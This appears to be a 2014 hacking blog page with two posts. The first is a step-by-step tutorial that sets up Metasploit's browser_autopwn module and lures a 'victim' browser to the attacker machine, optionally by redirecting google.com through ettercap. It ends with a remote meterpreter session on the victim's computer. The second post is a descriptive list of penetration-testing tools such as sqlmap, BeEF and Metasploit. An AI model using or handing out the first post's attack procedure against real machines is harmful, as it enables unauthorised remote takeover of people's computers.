Tuesday, 29 July 2014

exploiting windows7 using kali linux

How to Hack Windows 7  Using Metasploit In Kali Linux Tutorial


1). Start Backtrack
2). Type "Startx" To enter GUI mode of Backtrack.
3). Go To terminal
4). Type "msfconsole"

In Victim Machine
1). Start the victim Machine

Back to Backtrack
5). Type msf:>use auxiliary/server/browser_autopwn

[center][Image: 11653182.png][/center]

6). Thentype msf :>show Options Set LHOST means Localhost ip address To checkLocalhost ip Go to terminal And type "ifconfig"

7). msf:>set LHOST eg.192.168.168.1 After That you want set SRVPORT which is 80 or 8080

8). msf:>set SRVPORT 80 Then set URIPATH eg.root "/"

9). msf:>set URIPATH /

[center][Image: 11653227.png][/center]
Now Everything Is done

10). msf:>exploit or run

[center][Image: 11653242.png][/center]
Now What to need To to open On victim Machine

Open Any Browser Type Your BAcktrack Machine's ip address eg.<!-- m --><a class="postlink" href="http://192.168.168.1/">http://192.168.168.1/</a><!-- m -->

If You don't want to open backtrack machine's ip Address you can also do it With "ettercap" if user open <!-- m --><a class="postlink" href="http://www.google.com">http://www.google.com</a><!-- m --> it can also hacked.

After A minute you Can see our Session Is open

[center][Image: 11653314.png][/center]
To open a Meterprete

type msf:>sessions -i 1

[center][Image: 11653345.png][/center]

Saturday, 26 July 2014

Vulnerability Exploitation Tools

Here Are 8 Top 'Vulnerability Exploitation' Tools!


Vulnerability exploitation is not only a preferred tool for hackers, it's also a saving grace for security pros/ethical hackers to protect and secure their systems.
 
We live in a day and age, where our systems are increasingly prone to exploitation and hackers across the globe are becoming more and more sophisticated with respect to the tools they are using to carry out their attacks. The same tools of exploitation can become a way to detect crucial vulnerabilities in your own system and develop ways to remain protected in the future. The following tools are a fine example of the same!


1.W3af


This open-source web application security scanner provides a vulnerability scanner and exploitation tool for Web applications. It provides information about security vulnerabilities and aids in penetration testing efforts. It is written in the Python programming language and gives users the choice between a graphic user interface and a command-line interface.

2.Dradis

Tool for sharing information during a pentest. When a team of testers is working on the same project having a common repository of information is essential to avoid duplication of efforts. This self-contained web application provides such a centralised repository. 

3.BeEF

The Browser Exploitation Framework is a penetration testing tool that focuses on the web browser. BeEF looks past the hardened network perimeter and client system, and examines exploitability within the context of the web browser. 

4.Netsparker

False-positive-free web application security scanner that automatically discovers the flaws that could leave you dangerously exposed.

5.Social-Engineer Toolkit

Open-source Python-driven tool aimed at penetration testing around Social-Engineering.

6.sqlninja

Exploitation tool to be used against web apps based on MS SQL Server that are vulnerable to SQL Injection attacks, in order to get a shell or extract data also in very hostile conditions.

7.sqlmap

open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers.

8.Metasploit

The open source Metasploit Framework is essentially a tool for developing and executing exploit code against a remote target machine